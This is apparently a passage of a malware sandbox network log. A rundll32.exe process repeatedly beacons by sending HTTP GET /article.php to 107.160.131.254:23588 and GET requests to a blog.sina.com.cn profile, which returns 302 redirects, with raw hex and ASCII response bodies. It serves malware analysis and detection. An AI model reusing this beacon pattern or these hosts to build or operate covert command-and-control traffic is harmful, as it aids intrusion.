                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          107192.168.2.562729107.160.131.254235885400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:36:04.431344986 CET187OUTGET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          108192.168.2.562823116.133.8.92805400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:36:04.557611942 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                          Host: blog.sina.com.cn


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          109192.168.2.562825107.160.131.254235885400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:36:04.558063984 CET187OUTGET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          110192.168.2.549177107.160.131.254235885400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:36:08.567744970 CET187OUTGET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          111192.168.2.549188107.160.131.254235885400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:36:08.696515083 CET187OUTGET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          112192.168.2.549190116.133.8.92805400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:36:08.701653957 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                          Host: blog.sina.com.cn
                                                                                                                                          Dec 19, 2024 15:36:11.078775883 CET371INHTTP/1.1 302 Moved Temporarily
                                                                                                                                          Server: nginx/1.2.8
                                                                                                                                          Date: Thu, 19 Dec 2024 14:36:10 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 160
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          113192.168.2.551340107.160.131.254235885400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:36:12.701181889 CET187OUTGET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          114192.168.2.551417116.133.8.92805400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:36:12.983561039 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                          Host: blog.sina.com.cn
                                                                                                                                          Dec 19, 2024 15:36:14.681391954 CET371INHTTP/1.1 302 Moved Temporarily
                                                                                                                                          Server: nginx/1.2.8
                                                                                                                                          Date: Thu, 19 Dec 2024 14:36:14 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 160
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          115192.168.2.551418107.160.131.254235885400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:36:12.983938932 CET187OUTGET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          116192.168.2.552889107.160.131.254235885400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:36:16.716223955 CET187OUTGET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          117192.168.2.552994116.133.8.92805400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:36:16.839204073 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                          Host: blog.sina.com.cn


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          118192.168.2.552993107.160.131.254235885400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:36:16.839675903 CET187OUTGET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          119192.168.2.555567107.160.131.254235885400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:36:20.741781950 CET187OUTGET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          120192.168.2.555602107.160.131.254235885400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:36:20.852978945 CET187OUTGET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          121192.168.2.555604116.133.8.92805400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:36:20.860780954 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                          Host: blog.sina.com.cn


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          122192.168.2.557794107.160.131.254235885400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:36:24.749413013 CET187OUTGET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          123192.168.2.557901116.133.8.92805400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:36:24.866692066 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                          Host: blog.sina.com.cn
                                                                                                                                          Dec 19, 2024 15:36:26.715501070 CET371INHTTP/1.1 302 Moved Temporarily
                                                                                                                                          Server: nginx/1.2.8
                                                                                                                                          Date: Thu, 19 Dec 2024 14:36:26 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 160
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          124192.168.2.557903107.160.131.254235885400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:36:24.869019985 CET187OUTGET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          125192.168.2.560254107.160.131.254235885400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:36:28.763494015 CET187OUTGET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          126192.168.2.560361107.160.131.254235885400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:36:28.893871069 CET187OUTGET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          127192.168.2.560362116.133.8.92805400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:36:28.893976927 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                          Host: blog.sina.com.cn
                                                                                                                                          Dec 19, 2024 15:36:30.696933985 CET371INHTTP/1.1 302 Moved Temporarily
                                                                                                                                          Server: nginx/1.2.8
                                                                                                                                          Date: Thu, 19 Dec 2024 14:36:30 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 160
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          128192.168.2.562635107.160.131.254235885400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:36:32.816405058 CET187OUTGET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          129192.168.2.562667107.160.131.254235885400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:36:32.954329014 CET187OUTGET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          130192.168.2.563422116.133.8.92805400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:36:34.732695103 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                          Host: blog.sina.com.cn


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          131192.168.2.564310116.133.8.92805400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:36:36.318475008 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                          Host: blog.sina.com.cn
                                                                                                                                          Dec 19, 2024 15:36:38.041745901 CET371INHTTP/1.1 302 Moved Temporarily
                                                                                                                                          Server: nginx/1.2.8
                                                                                                                                          Date: Thu, 19 Dec 2024 14:36:37 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 160
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          132192.168.2.564311107.160.131.254235885400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:36:36.318864107 CET187OUTGET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          133192.168.2.564313107.160.131.254235885400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:36:36.323465109 CET187OUTGET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          134192.168.2.550290107.160.131.254235885400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:36:40.332423925 CET187OUTGET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          135192.168.2.550407116.133.8.92805400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:36:40.440642118 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                          Host: blog.sina.com.cn
                                                                                                                                          Dec 19, 2024 15:36:42.322608948 CET371INHTTP/1.1 302 Moved Temporarily
                                                                                                                                          Server: nginx/1.2.8
                                                                                                                                          Date: Thu, 19 Dec 2024 14:36:42 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 160
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          136192.168.2.550408107.160.131.254235885400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:36:40.443932056 CET187OUTGET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          137192.168.2.552832107.160.131.254235885400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:36:44.488199949 CET187OUTGET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          138192.168.2.552878107.160.131.254235885400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:36:44.533876896 CET187OUTGET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          139192.168.2.553368116.133.8.92805400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:36:46.002109051 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                          Host: blog.sina.com.cn
                                                                                                                                          Dec 19, 2024 15:36:47.818226099 CET371INHTTP/1.1 302 Moved Temporarily
                                                                                                                                          Server: nginx/1.2.8
                                                                                                                                          Date: Thu, 19 Dec 2024 14:36:47 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 160
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          140192.168.2.554804107.160.131.254235885400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:36:48.589313030 CET187OUTGET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          141192.168.2.554823107.160.131.254235885400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:36:48.724044085 CET187OUTGET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          142192.168.2.554824116.133.8.92805400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
